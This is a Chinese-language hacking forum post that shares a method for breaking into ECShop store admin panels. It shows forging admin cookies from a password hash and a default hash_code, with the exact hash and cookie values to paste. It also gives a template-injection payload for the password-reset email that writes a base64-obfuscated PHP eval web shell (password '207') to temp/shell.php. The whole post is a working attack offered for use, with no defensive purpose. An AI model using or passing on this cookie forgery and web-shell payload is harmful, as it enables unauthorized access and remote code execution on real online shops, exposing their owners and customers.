ecshop后台shell分享

之前出了几个ecshop漏洞，得到了密码但是都破解不出来，虽然知道后台。 下面分享一下我的经验，本人菜鸟高手勿喷！！

 用户密码 admin:d03a7617433c2826976062fec569a434 
ecshop 有一个表ecs_shop_config ，里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93
 
那就用之前的admin的密码和hash_code的 放在一起再一次MD5
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575
 
这个时候 用可以修改COOKIE的浏览器。修改cookie为
ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1
 
后面这个ECSCP_ID随意， 然后访问后台，就可以进去了。反正我是成功了N次，不懂你们。

{$user_name'];file_put_contents(base64_decode('Li4vdGVtcC9zaGVsbC5waHA='),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4='));echo $var['$user_name}
</p>
<p>{$user_name}您好！



您已经进行了密码重置的操作，请点击以下链接(或者复制到您的浏览器):



<atarget="_blank"href="{$reset_email}">{$reset_email}</a>



以确认您的新密码重置操作！



{$shop_name}

{$send_date}</p>

在后台登陆地方点忘记密码，输入用户和邮箱 提交就会在temp下生成shell.php一句话木马，密码是207
Li4vdGVtcC9zaGVsbC5waHA= 用base64解密就是 ../temp/shell.php